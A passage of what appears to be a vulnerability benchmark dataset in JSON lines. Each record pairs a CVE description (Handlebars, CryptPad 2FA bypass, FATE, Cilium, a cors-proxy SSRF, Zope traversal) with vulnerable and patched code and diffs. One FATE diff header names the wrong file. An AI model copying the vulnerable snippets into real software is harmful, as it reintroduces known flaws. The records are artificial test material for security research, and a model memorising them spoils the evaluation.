from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/handlebars-lang/handlebars.js", "patch_url": ["https://github.com/handlebars-lang/handlebars.js/commit/b6d3de7123eebba603e321f04afdbae608e8fea8", "https://github.com/handlebars-lang/handlebars.js/commit/f0589701698268578199be25285b2ebea1c1e427"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_92_1", "commit": "f058970", "file_path": "lib/handlebars/runtime.js", "start_line": "121", "end_line": "128", "snippet": " strict: function(obj, name, loc) {\n if (!obj || !(name in obj)) {\n throw new Exception('\"' + name + '\" not defined in ' + obj, {\n loc: loc\n });\n }\n return obj[name];\n },"}], "fix_func": [{"id": "fix_js_92_1", "commit": "b6d3de7", "file_path": "lib/handlebars/runtime.js", "start_line": "121", "end_line": "128", "snippet": " strict: function(obj, name, loc) {\n if (!obj || !(name in obj)) {\n throw new Exception('\"' + name + '\" not defined in ' + obj, {\n loc: loc\n });\n }\n return container.lookupProperty(obj, name);\n },"}], "vul_patch": "--- a/lib/handlebars/runtime.js\n+++ b/lib/handlebars/runtime.js\n@@ -4,5 +4,5 @@\n loc: loc\n });\n }\n- return obj[name];\n+ return container.lookupProperty(obj, name);\n },\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-49591", "cve_description": "CryptPad is a collaboration suite. Prior to version 2025.3.0, enforcement of Two-Factor Authentication (2FA) in CryptPad can be trivially bypassed, due to weak implementation of access controls. An attacker that compromises a user's credentials can gain access to the victim's account, even if the victim has 2FA set up. This is due to 2FA not being enforced if the path parameter is not 44 characters long, which can be bypassed by simply URL encoding a single character in the path. This issue has been patched in version 2025.3.0.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/cryptpad/cryptpad", "patch_url": ["https://github.com/cryptpad/cryptpad/commit/0c5d4bbf5e5206d53470ea86a664fa2b703fb611"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_133_1", "commit": "77b46f6", "file_path": "lib/http-worker.js", "start_line": 356, "end_line": 509, "snippet": "app.use('/block/', function (req, res, next) {\n var parsed = Path.parse(req.url);\n var name = parsed.name;\n // block access control only applies to files\n // identified by base64-encoded public keys\n // skip everything else, ie. /block/placeholder.txt\n if (typeof(name) !== 'string' || name.length !== 44) {\n return void res.status(404).json({\n error: \"INVALID_ID\",\n });\n }\n\n var authorization = req.headers.authorization;\n\n var mfa_params, sso_params;\n nThen(function (w) {\n // First, check whether the block id in question has any MFA settings stored\n MFA.read(Env, name, w(function (err, content) {\n // ENOENT means there are no settings configured\n // it could be a 404 or an existing block without MFA protection\n // in either case you can abort and fall through\n // allowing the static webserver to handle either case\n if (err && err.code === 'ENOENT') {\n return;\n }\n\n // we're not expecting other errors. the sensible thing is to fail\n // closed - meaning assume some protection is in place but that\n // the settings couldn't be loaded for some reason. block access\n // to the resource, logging for the admin and responding to the client\n // with a vague error code\n if (err) {\n Log.error('GET_BLOCK_METADATA', err);\n return void res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n\n // Otherwise, some settings were loaded correctly.\n // We're expecting stringified JSON, so try to parse it.\n // Log and respond with an error again if this fails.\n // If it parses successfully then fall through to the next block.\n try {\n mfa_params = JSON.parse(content);\n } catch (err2) {\n w.abort();\n Log.error(\"INVALID_BLOCK_METADATA\", err2);\n return res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n }));\n\n // Same for SSO settings\n if (!SSOUtils) { return; }\n SSOUtils.readBlock(Env, name, w(function (err, content) {\n if (err && (err.code === 'ENOENT' || err === 'ENOENT')) {\n return;\n }\n if (err) {\n Log.error('GET_BLOCK_METADATA', err);\n return void res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n sso_params = content;\n }));\n }).nThen(function (w) {\n if (!mfa_params && !sso_params) {\n w.abort();\n next();\n }\n }).nThen(function (w) {\n // We should only be able to reach this logic\n // if we successfully loaded and parsed some JSON\n // representing the user's MFA and/or SSO settings.\n\n // Failures at this point relate to insufficient or incorrect authorization.\n // This function standardizes how we reject such requests.\n\n // So far the only additional factor which is supported is TOTP.\n // We specify what the method is to allow for future alternatives\n // and inform the client so they can determine how to respond\n // \"401\" means \"Unauthorized\"\n var no = function () {\n w.abort();\n res.status(401).json({\n sso: Boolean(sso_params),\n method: mfa_params && mfa_params.method,\n code: 401\n });\n };\n\n // if you are here it is because this block is protected by MFA or SSO.\n // they will need to provide a JSON Web Token, so we can reject them outright\n // if one is not present in their authorization header\n if (!authorization) { return void no(); }\n\n // The authorization header should be of the form\n // \"Authorization: Bearer \"\n // We can reject the request if it is malformed.\n let token = authorization.replace(/^Bearer\\s+/, '').trim();\n if (!token) { return void no(); }\n\n Sessions.read(Env, name, token, function (err, contentStr) {\n if (err) {\n Log.error('SESSION_READ_ERROR', err);\n return res.status(401).json({\n sso: Boolean(sso_params),\n method: mfa_params && mfa_params.method,\n code: 401,\n });\n }\n\n let content = Util.tryParse(contentStr);\n\n if (mfa_params && !content.mfa) { return void no(); }\n if (sso_params && !content.sso) { return void no(); }\n\n if (content.mfa && content.mfa.exp && (+new Date()) > content.mfa.exp) {\n Log.error(\"OTP_SESSION_EXPIRED\", content.mfa);\n Sessions.delete(Env, name, token, function (err) {\n if (err) {\n Log.error('SESSION_DELETE_EXPIRED_ERROR', err);\n return;\n }\n Log.info('SESSION_DELETE_EXPIRED', err);\n });\n return void no();\n }\n\n\n if (content.sso && content.sso.exp && (+new Date()) > content.sso.exp) {\n Log.error(\"SSO_SESSION_EXPIRED\", content.sso);\n Sessions.delete(Env, name, token, function (err) {\n if (err) {\n Log.error('SSO_SESSION_DELETE_EXPIRED_ERROR', err);\n return;\n }\n Log.info('SSO_SESSION_DELETE_EXPIRED', err);\n });\n return void no();\n }\n\n // Interpret the existence of a file in that location as the continued\n // validity of the session. Fall through and let the built-in webserver\n // handle the 404 or serving the file.\n next();\n });\n });\n});"}], "fix_func": [{"id": "fix_js_133_1", "commit": "0c5d4bb", "file_path": "lib/http-worker.js", "start_line": 356, "end_line": 512, "snippet": "app.use('/block/', function (req, res, next) {\n var parsed = Path.parse(req.url);\n var name = parsed.name;\n // block access control only applies to files\n // identified by base64-encoded public keys\n // skip everything else, ie. /block/placeholder.txt\n if (/placeholder\\.txt(\\?.+)?/.test(parsed.base)) {\n return void next();\n }\n if (typeof(name) !== 'string' || name.length !== 44) {\n return void res.status(404).json({\n error: \"INVALID_ID\",\n });\n }\n\n var authorization = req.headers.authorization;\n\n var mfa_params, sso_params;\n nThen(function (w) {\n // First, check whether the block id in question has any MFA settings stored\n MFA.read(Env, name, w(function (err, content) {\n // ENOENT means there are no settings configured\n // it could be a 404 or an existing block without MFA protection\n // in either case you can abort and fall through\n // allowing the static webserver to handle either case\n if (err && err.code === 'ENOENT') {\n return;\n }\n\n // we're not expecting other errors. the sensible thing is to fail\n // closed - meaning assume some protection is in place but that\n // the settings couldn't be loaded for some reason. block access\n // to the resource, logging for the admin and responding to the client\n // with a vague error code\n if (err) {\n Log.error('GET_BLOCK_METADATA', err);\n return void res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n\n // Otherwise, some settings were loaded correctly.\n // We're expecting stringified JSON, so try to parse it.\n // Log and respond with an error again if this fails.\n // If it parses successfully then fall through to the next block.\n try {\n mfa_params = JSON.parse(content);\n } catch (err2) {\n w.abort();\n Log.error(\"INVALID_BLOCK_METADATA\", err2);\n return res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n }));\n\n // Same for SSO settings\n if (!SSOUtils) { return; }\n SSOUtils.readBlock(Env, name, w(function (err, content) {\n if (err && (err.code === 'ENOENT' || err === 'ENOENT')) {\n return;\n }\n if (err) {\n Log.error('GET_BLOCK_METADATA', err);\n return void res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n sso_params = content;\n }));\n }).nThen(function (w) {\n if (!mfa_params && !sso_params) {\n w.abort();\n next();\n }\n }).nThen(function (w) {\n // We should only be able to reach this logic\n // if we successfully loaded and parsed some JSON\n // representing the user's MFA and/or SSO settings.\n\n // Failures at this point relate to insufficient or incorrect authorization.\n // This function standardizes how we reject such requests.\n\n // So far the only additional factor which is supported is TOTP.\n // We specify what the method is to allow for future alternatives\n // and inform the client so they can determine how to respond\n // \"401\" means \"Unauthorized\"\n var no = function () {\n w.abort();\n res.status(401).json({\n sso: Boolean(sso_params),\n method: mfa_params && mfa_params.method,\n code: 401\n });\n };\n\n // if you are here it is because this block is protected by MFA or SSO.\n // they will need to provide a JSON Web Token, so we can reject them outright\n // if one is not present in their authorization header\n if (!authorization) { return void no(); }\n\n // The authorization header should be of the form\n // \"Authorization: Bearer \"\n // We can reject the request if it is malformed.\n let token = authorization.replace(/^Bearer\\s+/, '').trim();\n if (!token) { return void no(); }\n\n Sessions.read(Env, name, token, function (err, contentStr) {\n if (err) {\n Log.error('SESSION_READ_ERROR', err);\n return res.status(401).json({\n sso: Boolean(sso_params),\n method: mfa_params && mfa_params.method,\n code: 401,\n });\n }\n\n let content = Util.tryParse(contentStr);\n\n if (mfa_params && !content.mfa) { return void no(); }\n if (sso_params && !content.sso) { return void no(); }\n\n if (content.mfa && content.mfa.exp && (+new Date()) > content.mfa.exp) {\n Log.error(\"OTP_SESSION_EXPIRED\", content.mfa);\n Sessions.delete(Env, name, token, function (err) {\n if (err) {\n Log.error('SESSION_DELETE_EXPIRED_ERROR', err);\n return;\n }\n Log.info('SESSION_DELETE_EXPIRED', err);\n });\n return void no();\n }\n\n\n if (content.sso && content.sso.exp && (+new Date()) > content.sso.exp) {\n Log.error(\"SSO_SESSION_EXPIRED\", content.sso);\n Sessions.delete(Env, name, token, function (err) {\n if (err) {\n Log.error('SSO_SESSION_DELETE_EXPIRED_ERROR', err);\n return;\n }\n Log.info('SSO_SESSION_DELETE_EXPIRED', err);\n });\n return void no();\n }\n\n // Interpret the existence of a file in that location as the continued\n // validity of the session. Fall through and let the built-in webserver\n // handle the 404 or serving the file.\n next();\n });\n });\n});"}], "vul_patch": "--- a/lib/http-worker.js\n+++ b/lib/http-worker.js\n@@ -4,6 +4,9 @@\n // block access control only applies to files\n // identified by base64-encoded public keys\n // skip everything else, ie. /block/placeholder.txt\n+ if (/placeholder\\.txt(\\?.+)?/.test(parsed.base)) {\n+ return void next();\n+ }\n if (typeof(name) !== 'string' || name.length !== 44) {\n return void res.status(404).json({\n error: \"INVALID_ID\",\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-25459", "cve_description": "An issue was discovered in function sync_tree in hetero_decision_tree_guest.py in WeBank FATE (Federated AI Technology Enabler) 0.1 through 1.4.2 allows attackers to read sensitive information during the training process of machine learning joint modeling.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/FederatedAI/FATE", "patch_url": ["https://github.com/FederatedAI/FATE/commit/6feccf6d752184a6f9365d56a76fe627983e7139"], "programing_language": "Python", "vul_func": [{"id": "vul_py_44_1", "commit": "67708d5", "file_path": "federatedml/tree/hetero/hetero_decision_tree_guest.py", "start_line": 532, "end_line": 544, "snippet": " def sync_tree(self):\n LOGGER.info(\"sync tree to host\")\n\n self.transfer_inst.tree.remote(self.tree_,\n role=consts.HOST,\n idx=-1)\n \"\"\"\n federation.remote(obj=self.tree_,\n name=self.transfer_inst.tree.name,\n tag=self.transfer_inst.generate_transferid(self.transfer_inst.tree),\n role=consts.HOST,\n idx=-1)\n \"\"\""}], "fix_func": [{"id": "fix_py_44_1", "commit": "6feccf6", "file_path": "federatedml/tree/hetero/hetero_decision_tree_guest.py", "start_line": 544, "end_line": 557, "snippet": " def sync_tree(self):\n LOGGER.info(\"sync tree to host\")\n\n tree_nodes = self.remove_sensitive_info()\n self.transfer_inst.tree.remote(tree_nodes,\n role=consts.HOST,\n idx=-1)\n \"\"\"\n federation.remote(obj=self.tree_,\n name=self.transfer_inst.tree.name,\n tag=self.transfer_inst.generate_transferid(self.transfer_inst.tree),\n role=consts.HOST,\n idx=-1)\n \"\"\""}, {"id": "fix_py_44_2", "commit": "6feccf6", "file_path": "federatedml/tree/hetero/hetero_decision_tree_host.py", "start_line": 532, "end_line": 542, "snippet": " return model_param\n\n def set_model_param(self, model_param):\n self.tree_ = []\n for node_param in model_param.tree_:\n _node = Node(id=node_param.id,\n sitename=node_param.sitename,\n fid=node_param.fid,\n bid=node_param.bid,\n weight=node_param.weight,\n is_leaf=node_param.is_leaf,"}], "vul_patch": "--- a/federatedml/tree/hetero/hetero_decision_tree_guest.py\n+++ b/federatedml/tree/hetero/hetero_decision_tree_guest.py\n@@ -1,7 +1,8 @@\n def sync_tree(self):\n LOGGER.info(\"sync tree to host\")\n \n- self.transfer_inst.tree.remote(self.tree_,\n+ tree_nodes = self.remove_sensitive_info()\n+ self.transfer_inst.tree.remote(tree_nodes,\n role=consts.HOST,\n idx=-1)\n \"\"\"\n\n--- /dev/null\n+++ b/federatedml/tree/hetero/hetero_decision_tree_guest.py\n@@ -0,0 +1,11 @@\n+ return model_param\n+\n+ def set_model_param(self, model_param):\n+ self.tree_ = []\n+ for node_param in model_param.tree_:\n+ _node = Node(id=node_param.id,\n+ sitename=node_param.sitename,\n+ fid=node_param.fid,\n+ bid=node_param.bid,\n+ weight=node_param.weight,\n+ is_leaf=node_param.is_leaf,\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-25459:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/FATE\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2020-25459/bin/python hand_test.py\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-25459:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/FATE\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2020-25459/bin/python -m pytest federatedml/tree/test/ -v"} {"cve_id": "CVE-2024-42488", "cve_description": "Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.14.14 and 1.15.8, a race condition in the Cilium agent can cause the agent to ignore labels that should be applied to a node. This could in turn cause CiliumClusterwideNetworkPolicies intended for nodes with the ignored label to not apply, leading to policy bypass. This issue has been patched in Cilium v1.14.14 and v1.15.8 As the underlying issue depends on a race condition, users unable to upgrade can restart the Cilium agent on affected nodes until the affected policies are confirmed to be working as expected.", "cwe_info": {"CWE-362": {"name": "Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')", "description": "The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently."}}, "repo": "https://github.com/cilium/cilium", "patch_url": ["https://github.com/cilium/cilium/commit/aa44dd148a9be95e07782e4f990e61678ef0abf8"], "programing_language": "Go", "vul_func": [{"id": "vul_go_295_1", "commit": "fdb97702d2fdff51b01aad8c4948f33dab7c2513", "file_path": "pkg/endpointmanager/host.go", "start_line": 32, "end_line": 41, "snippet": "func (mgr *endpointManager) startNodeLabelsObserver(old map[string]string) {\n\tmgr.localNodeStore.Observe(context.Background(), func(ln node.LocalNode) {\n\t\tif maps.Equal(old, ln.Labels) {\n\t\t\treturn\n\t\t}\n\n\t\tmgr.updateHostEndpointLabels(old, ln.Labels)\n\t\told = ln.Labels\n\t}, func(error) { /* Executed only when we are shutting down */ })\n}"}, {"id": "vul_go_295_2", "commit": "fdb97702d2fdff51b01aad8c4948f33dab7c2513", "file_path": "pkg/endpointmanager/host.go", "start_line": 43, "end_line": 58, "snippet": "func (mgr *endpointManager) updateHostEndpointLabels(oldNodeLabels, newNodeLabels map[string]string) {\n\tnodeEP := mgr.GetHostEndpoint()\n\tif nodeEP == nil {\n\t\tlog.Error(\"Host endpoint not found\")\n\t\treturn\n\t}\n\n\terr := nodeEP.UpdateLabelsFrom(oldNodeLabels, newNodeLabels, labels.LabelSourceK8s)\n\tif err != nil {\n\t\t// An error can only occur if either the endpoint is terminating, or the\n\t\t// old labels are not found. Both are impossible, hence there's no point\n\t\t// in retrying.\n\t\tlog.WithError(err).Error(\"Unable to update host endpoint labels\")\n\t\treturn\n\t}\n}"}], "fix_func": [{"id": "fix_go_295_1", "commit": "aa44dd148a9be95e07782e4f990e61678ef0abf8", "file_path": "pkg/endpointmanager/host.go", "start_line": 32, "end_line": 46, "snippet": "func (mgr *endpointManager) startNodeLabelsObserver(old map[string]string) {\n\tmgr.localNodeStore.Observe(context.Background(), func(ln node.LocalNode) {\n\t\tif maps.Equal(old, ln.Labels) {\n\t\t\treturn\n\t\t}\n\n\t\tif mgr.updateHostEndpointLabels(old, ln.Labels) {\n\t\t\t// Endpoint's label update logic rejects a request if any of the old labels are\n\t\t\t// not present in the endpoint manager's state. So, overwrite old labels only if\n\t\t\t// the update is successful to avoid node labels being outdated indefinitely (GH-29649).\n\t\t\told = ln.Labels\n\t\t}\n\n\t}, func(error) { /* Executed only when we are shutting down */ })\n}"}, {"id": "fix_go_295_2", "commit": "aa44dd148a9be95e07782e4f990e61678ef0abf8", "file_path": "pkg/endpointmanager/host.go", "start_line": 50, "end_line": 65, "snippet": "func (mgr *endpointManager) updateHostEndpointLabels(oldNodeLabels, newNodeLabels map[string]string) bool {\n\tnodeEP := mgr.GetHostEndpoint()\n\tif nodeEP == nil {\n\t\tlog.Error(\"Host endpoint not found\")\n\t\treturn false\n\t}\n\n\tif err := nodeEP.UpdateLabelsFrom(oldNodeLabels, newNodeLabels, labels.LabelSourceK8s); err != nil {\n\t\t// An error can only occur if either the endpoint is terminating, or the\n\t\t// old labels are not found. Both are impossible, hence there's no point\n\t\t// in retrying.\n\t\tlog.WithError(err).Error(\"Unable to update host endpoint labels\")\n\t\treturn false\n\t}\n\treturn true\n}"}], "vul_patch": "--- a/pkg/endpointmanager/host.go\n+++ b/pkg/endpointmanager/host.go\n@@ -4,7 +4,12 @@\n \t\t\treturn\n \t\t}\n \n-\t\tmgr.updateHostEndpointLabels(old, ln.Labels)\n-\t\told = ln.Labels\n+\t\tif mgr.updateHostEndpointLabels(old, ln.Labels) {\n+\t\t\t// Endpoint's label update logic rejects a request if any of the old labels are\n+\t\t\t// not present in the endpoint manager's state. So, overwrite old labels only if\n+\t\t\t// the update is successful to avoid node labels being outdated indefinitely (GH-29649).\n+\t\t\told = ln.Labels\n+\t\t}\n+\n \t}, func(error) { /* Executed only when we are shutting down */ })\n }\n\n--- a/pkg/endpointmanager/host.go\n+++ b/pkg/endpointmanager/host.go\n@@ -1,16 +1,16 @@\n-func (mgr *endpointManager) updateHostEndpointLabels(oldNodeLabels, newNodeLabels map[string]string) {\n+func (mgr *endpointManager) updateHostEndpointLabels(oldNodeLabels, newNodeLabels map[string]string) bool {\n \tnodeEP := mgr.GetHostEndpoint()\n \tif nodeEP == nil {\n \t\tlog.Error(\"Host endpoint not found\")\n-\t\treturn\n+\t\treturn false\n \t}\n \n-\terr := nodeEP.UpdateLabelsFrom(oldNodeLabels, newNodeLabels, labels.LabelSourceK8s)\n-\tif err != nil {\n+\tif err := nodeEP.UpdateLabelsFrom(oldNodeLabels, newNodeLabels, labels.LabelSourceK8s); err != nil {\n \t\t// An error can only occur if either the endpoint is terminating, or the\n \t\t// old labels are not found. Both are impossible, hence there's no point\n \t\t// in retrying.\n \t\tlog.WithError(err).Error(\"Unable to update host endpoint labels\")\n-\t\treturn\n+\t\treturn false\n \t}\n+\treturn true\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23664", "cve_description": "The package @isomorphic-git/cors-proxy before 2.7.1 are vulnerable to Server-side Request Forgery (SSRF) due to missing sanitization and validation of the redirection action in middleware.js.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/isomorphic-git/cors-proxy", "patch_url": ["https://github.com/isomorphic-git/cors-proxy/commit/1b1c91e71d946544d97ccc7cf0ac62b859e03311"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_239_1", "commit": "617b73f", "file_path": "middleware.js", "start_line": 102, "end_line": 153, "snippet": " function middleware (req, res) {\n let u = url.parse(req.url, true)\n\n\n let headers = {}\n for (let h of allowHeaders) {\n if (req.headers[h]) {\n headers[h] = req.headers[h]\n }\n }\n\n // GitHub uses user-agent sniffing for git/* and changes its behavior which is frustrating\n if (!headers['user-agent'] || !headers['user-agent'].startsWith('git/')) {\n headers['user-agent'] = 'git/@isomorphic-git/cors-proxy'\n }\n\n let p = u.path\n let parts = p.match(/\\/([^\\/]*)\\/(.*)/)\n let pathdomain = parts[1]\n let remainingpath = parts[2]\n let protocol = insecure_origins.includes(pathdomain) ? 'http' : 'https'\n\n fetch(\n `${protocol}://${pathdomain}/${remainingpath}`,\n {\n method: req.method,\n headers,\n body: (req.method !== 'GET' && req.method !== 'HEAD') ? req : undefined\n }\n ).then(f => {\n res.statusCode = f.status\n for (let h of exposeHeaders) {\n if (h === 'content-length') continue\n if (f.headers.has(h)) {\n res.setHeader(h, f.headers.get(h))\n }\n }\n if (f.redirected) {\n res.setHeader('x-redirected-url', f.url)\n }\n f.body.pipe(res)\n })\n }\n const cors = microCors({\n allowHeaders,\n exposeHeaders,\n allowMethods,\n allowCredentials: false,\n origin\n })\n return filter(predicate, cors(compose(sendCorsOK, authorization, middleware)))\n}"}, {"id": "vul_js_239_2", "commit": "617b73f", "file_path": "middleware.js", "start_line": 27, "end_line": 44, "snippet": "const exposeHeaders = [\n 'accept-ranges',\n 'age',\n 'cache-control',\n 'content-length',\n 'content-language',\n 'content-type',\n 'date',\n 'etag',\n 'expires',\n 'last-modified',\n 'pragma',\n 'server',\n 'transfer-encoding',\n 'vary',\n 'x-github-request-id',\n 'x-redirected-url',\n]"}], "fix_func": [{"id": "fix_js_239_1", "commit": "1b1c91e71d946544d97ccc7cf0ac62b859e03311", "file_path": "middleware.js", "start_line": 103, "end_line": 160, "snippet": " function middleware (req, res) {\n let u = url.parse(req.url, true)\n\n\n let headers = {}\n for (let h of allowHeaders) {\n if (req.headers[h]) {\n headers[h] = req.headers[h]\n }\n }\n\n // GitHub uses user-agent sniffing for git/* and changes its behavior which is frustrating\n if (!headers['user-agent'] || !headers['user-agent'].startsWith('git/')) {\n headers['user-agent'] = 'git/@isomorphic-git/cors-proxy'\n }\n\n let p = u.path\n let parts = p.match(/\\/([^\\/]*)\\/(.*)/)\n let pathdomain = parts[1]\n let remainingpath = parts[2]\n let protocol = insecure_origins.includes(pathdomain) ? 'http' : 'https'\n\n fetch(\n `${protocol}://${pathdomain}/${remainingpath}`,\n {\n method: req.method,\n redirect: 'manual',\n headers,\n body: (req.method !== 'GET' && req.method !== 'HEAD') ? req : undefined\n }\n ).then(f => {\n if (f.headers.has('location')) {\n // Modify the location so the client continues to use the proxy\n let newUrl = f.headers.get('location').replace(/^https?:\\//, '')\n f.headers.set('location', newUrl)\n }\n res.statusCode = f.status\n for (let h of exposeHeaders) {\n if (h === 'content-length') continue\n if (f.headers.has(h)) {\n res.setHeader(h, f.headers.get(h))\n }\n }\n if (f.redirected) {\n res.setHeader('x-redirected-url', f.url)\n }\n f.body.pipe(res)\n })\n }\n const cors = microCors({\n allowHeaders,\n exposeHeaders,\n allowMethods,\n allowCredentials: false,\n origin\n })\n return filter(predicate, cors(compose(sendCorsOK, authorization, middleware)))\n}"}, {"id": "fix_js_239_2", "commit": "1b1c91e71d946544d97ccc7cf0ac62b859e03311", "file_path": "middleware.js", "start_line": 27, "end_line": 45, "snippet": "const exposeHeaders = [\n 'accept-ranges',\n 'age',\n 'cache-control',\n 'content-length',\n 'content-language',\n 'content-type',\n 'date',\n 'etag',\n 'expires',\n 'last-modified',\n 'location',\n 'pragma',\n 'server',\n 'transfer-encoding',\n 'vary',\n 'x-github-request-id',\n 'x-redirected-url',\n]"}], "vul_patch": "--- a/middleware.js\n+++ b/middleware.js\n@@ -24,10 +24,16 @@\n `${protocol}://${pathdomain}/${remainingpath}`,\n {\n method: req.method,\n+ redirect: 'manual',\n headers,\n body: (req.method !== 'GET' && req.method !== 'HEAD') ? req : undefined\n }\n ).then(f => {\n+ if (f.headers.has('location')) {\n+ // Modify the location so the client continues to use the proxy\n+ let newUrl = f.headers.get('location').replace(/^https?:\\//, '')\n+ f.headers.set('location', newUrl)\n+ }\n res.statusCode = f.status\n for (let h of exposeHeaders) {\n if (h === 'content-length') continue\n\n--- a/middleware.js\n+++ b/middleware.js\n@@ -9,6 +9,7 @@\n 'etag',\n 'expires',\n 'last-modified',\n+ 'location',\n 'pragma',\n 'server',\n 'transfer-encoding',\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-32633", "cve_description": "Zope is an open-source web application server. In Zope versions prior to 4.6 and 5.2, users can access untrusted modules indirectly through Python modules that are available for direct use. By default, only users with the Manager role can add or edit Zope Page Templates through the web, but sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk from this vulnerability. The problem has been fixed in Zope 5.2 and 4.6. As a workaround, a site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/zopefoundation/Zope", "patch_url": ["https://github.com/zopefoundation/Zope/commit/1f8456bf1f908ea46012537d52bd7e752a532c91"], "programing_language": "Python", "vul_func": [{"id": "vul_py_145_1", "commit": "1746d5a", "file_path": "src/Products/PageTemplates/Expressions.py", "start_line": 64, "end_line": 82, "snippet": "def boboAwareZopeTraverse(object, path_items, econtext):\n \"\"\"Traverses a sequence of names, first trying attributes then items.\n\n This uses zope.traversing path traversal where possible and interacts\n correctly with objects providing OFS.interface.ITraversable when\n necessary (bobo-awareness).\n \"\"\"\n request = getattr(econtext, 'request', None)\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n if OFS.interfaces.ITraversable.providedBy(object):\n object = object.restrictedTraverse(name)\n else:\n object = traversePathElement(object, name, path_items,\n request=request)\n return object"}, {"id": "vul_py_145_2", "commit": "1746d5a", "file_path": "src/Products/PageTemplates/expression.py", "start_line": 56, "end_line": 70, "snippet": " def traverse(cls, base, request, path_items):\n \"\"\"See ``zope.app.pagetemplate.engine``.\"\"\"\n\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n if ITraversable.providedBy(base):\n base = getattr(base, cls.traverseMethod)(name)\n else:\n base = traversePathElement(base, name, path_items,\n request=request)\n\n return base"}], "fix_func": [{"id": "fix_py_145_1", "commit": "1f8456b", "file_path": "src/Products/PageTemplates/Expressions.py", "start_line": 65, "end_line": 91, "snippet": "def boboAwareZopeTraverse(object, path_items, econtext):\n \"\"\"Traverses a sequence of names, first trying attributes then items.\n\n This uses zope.traversing path traversal where possible and interacts\n correctly with objects providing OFS.interface.ITraversable when\n necessary (bobo-awareness).\n \"\"\"\n request = getattr(econtext, 'request', None)\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n\n if name == '_':\n warnings.warn('Traversing to the name `_` is deprecated '\n 'and will be removed in Zope 6.',\n DeprecationWarning)\n elif name.startswith('_'):\n raise NotFound(name)\n\n if OFS.interfaces.ITraversable.providedBy(object):\n object = object.restrictedTraverse(name)\n else:\n object = traversePathElement(object, name, path_items,\n request=request)\n return object"}, {"id": "fix_py_145_2", "commit": "1f8456b", "file_path": "src/Products/PageTemplates/expression.py", "start_line": 57, "end_line": 79, "snippet": " def traverse(cls, base, request, path_items):\n \"\"\"See ``zope.app.pagetemplate.engine``.\"\"\"\n\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n\n if name == '_':\n warnings.warn('Traversing to the name `_` is deprecated '\n 'and will be removed in Zope 6.',\n DeprecationWarning)\n elif name.startswith('_'):\n raise NotFound(name)\n\n if ITraversable.providedBy(base):\n base = getattr(base, cls.traverse_method)(name)\n else:\n base = traversePathElement(base, name, path_items,\n request=request)\n\n return base"}], "vul_patch": "--- a/src/Products/PageTemplates/Expressions.py\n+++ b/src/Products/PageTemplates/Expressions.py\n@@ -11,6 +11,14 @@\n \n while path_items:\n name = path_items.pop()\n+\n+ if name == '_':\n+ warnings.warn('Traversing to the name `_` is deprecated '\n+ 'and will be removed in Zope 6.',\n+ DeprecationWarning)\n+ elif name.startswith('_'):\n+ raise NotFound(name)\n+\n if OFS.interfaces.ITraversable.providedBy(object):\n object = object.restrictedTraverse(name)\n else:\n\n--- a/src/Products/PageTemplates/expression.py\n+++ 